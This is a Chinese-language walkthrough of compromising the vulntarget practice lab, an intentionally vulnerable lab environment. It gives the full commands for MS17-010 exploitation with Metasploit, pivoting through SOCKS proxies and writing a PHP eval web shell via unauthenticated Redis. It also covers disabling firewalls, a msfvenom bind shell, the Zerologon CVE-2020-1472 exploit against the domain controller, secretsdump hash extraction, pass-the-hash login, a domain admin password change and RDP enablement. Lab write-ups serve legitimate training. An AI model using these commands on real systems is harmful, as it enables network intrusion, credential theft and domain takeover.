ad一，靶场搭建

下载靶场：GitHub - crow821/vulntarget: vulntarget靶场系列

官方拓补图

 ps：此处 攻击机ip192.168.87.134，win7ip1为192.168.87.144

下载完毕后直接装入虚拟机不要进去，不要进去，不要进去

唯一 要修改的是网卡

设置虚拟网卡：默认为vmnet18和vmnet19

找到虚拟网卡编辑器

右下角点更改设置

同下图配置vmnet18

同理配置vmnet19

 

检查各设备的网卡设置

 

单机选设置打开窗口查看

win2019

 

Win11016

 

win7

 

配完去攻击机上访问win7ip看看能否访问，可以就表示配置完成

渗透开始 

信息收集（win7）

nmap  -sT 192.168.87.0/24

发现win7

访问 

 

查看开放了那些端口

nmap -sT --min-rate 10000 -p- 192.168.87.144 

发现开放了445端口，决定用永恒之蓝一把嗦

 输入msfconsole启动msf

clearsearch ms17-010use 0set Rhost 192.168.87.144run

 

进入meterperter成功拿下

win7信息收集

ipconfig

发现了c段位20的内网

 但别急先留个路由

run post/multi/manage/autoroute

 退回msf6（小白必看）

bgback

这么做是为了保存session

搜索20c段的主机

使用arp_scanner模块

use post/windows/gather/arp_scanner
set session 1
set rhosts 10.0.20.0/24

 发现了99主机

使用socks_proxy做代理

use auxiliary/server/socks_proxy
set version 4a
run

修改etc/proxychains4.conf

vim /etc/proxychains4.conf

加上 socks4即可

esc：wq退出

使用proxychains4对10.0.20.99进行端口扫描

proxychains4 nmap -Pn -sT -p21,22,23,80-90,161,389,443,445,873,1099,1433,1521,1900,2082,2083,2222,2601,2604,3128,3306,3311,3312,3389,4440,4848,5432,5560,5900,5901,5902,6082,6379,7001-7010,7778,8080-8090,8649,8888,9000,9200,10000,11211,27017,28017,50000,50030,50060,135,139,445,53,88 10.0.20.99

看结果

扫到了 如上端口

开放了80端口访问一下phpinfo.php

ctrl f搜索root

发现了根目录路径

 使用redis未授权访问xieshell

注意kali不会自带redis使用要下载redis

redis下载

参考http://t.csdnimg.cn/FnwUE

proxychains4 redis-cli -h 10.0.20.99

进入目录写入shell

config set dir 'C:/phpStudy/PHPTutorial/WWW/'
config set dbfilename shell.php
set 1 "<?php @eval($_POST['cmd'])?>"
save

 用procychains4代理使用哥斯拉连接

哥斯拉下载

官网https://github.com/BeichenDream/Godzilla

 

下载jar包后拖入虚拟机使用

注意使用时要保证你处于jar包同更目录不然访问不到

以砖面为例

弹出界面即唱功

 点击target，选择add，如下填写

 添加唱功后enter进入

进入控制台

 

 关闭防火前以便于传shell

netsh advfirewall set allprofiles state off		

用msfvenom写一个shell 

msfvenom -p windows/x64/meterpreter/bind_tcp rhost=10.0.20.99 lport=4444 -f exe -o shell.exe

 可在桌面上发现

打开f哥斯拉的ilemanger 拖入上传

 打开控制台运行shell

.\shell.exe

 msf连接shell

成功

win2016信息收集

ipconfig发现10c段

加个路由先

run post/multi/manage/autoroute

 进shell继续星系收集

 

shellChcp 65001  #优化shell使用utf-8编码systeminfo

发现了域 vulntarget.com

查看域控（有时不好使）

net group "Domain Controllers" /domain

发现域控win2019ping一下

 

ping -n 1 WIN2019

ip为 10.0.10.110

CVE-2020-1472上线域控

exp下载

地址https://github.com/VoidSec/CVE-2020-1472

 

下这个就行，放桌面

运行

proxychains4 python3 cve-2020-1472-exploit.py 域控主机名 域控IP
proxychains4 python3 cve-2020-1472-exploit.py WIN2019 10.0.10.110
不行的话
给他加个参数
proxychains4 python3 cve-2020-1472-exploit.py -t WIN2019 -n 10.0.10.110

获取hash

proxychains4 impacket-secretsdump vulntarget.com/win2019\$@10.0.10.110 -no-pass

 得到hash，wmiexec上线

proxychains4 impacket-wmiexec -hashes aad3b435b51404eeaad3b435b51404ee:9099d68602a60f007c227c4fa95fada6 ./administrator@10.0.10.110

成功

net user administrator p-0p-0p-0 /domain		#修改域控密码
netsh advfirewall set allprofiles state off		#关防火墙#开3389
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

已完成不做演示，已经打穿

图形化连接域控

使用remmina

apt install -y remmina
或
dnf install -y remmina

启动

proxychains4 remmina

改下配置

连接

 

 

 

成功

修改一下窗口尺寸

点玩后ctrl加滚轮可对其缩放

但有时会遇到连接失败的问题

是3389打开与否问题

可尝试

 reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /t REG_DWORD /v portnumber /d 3389 /fwmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allowreg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f

完